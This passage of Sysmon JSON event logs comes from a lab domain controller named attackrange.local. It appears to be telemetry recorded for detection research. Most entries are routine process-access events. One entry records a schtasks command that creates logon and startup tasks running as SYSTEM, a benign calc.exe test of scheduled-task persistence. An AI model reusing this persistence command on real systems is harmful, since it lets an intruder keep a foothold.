indows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5684,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5685,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.104\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.104","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5686,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.119\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.119","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001068550800}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5687,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.119\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.119","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001068550800}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.157\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nProcessId: 3212\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: schtasks  /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nParentProcessId: 4924\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" & schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.157","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-001019560800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"schtasks  /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11D7-5F25-0000-001068550800}","ParentProcessId":"4924","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\" &amp; schtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\" ","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-11D7-5F25-0000-001068550800}\r\nSourceProcessId: 4924\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001068550800}","SourceProcessId":"4924","SourceThreadId":"4104","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+8564|C:\\Windows\\system32\\cmd.exe+c347|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-001019560800}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-001019560800}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.151\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.151","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2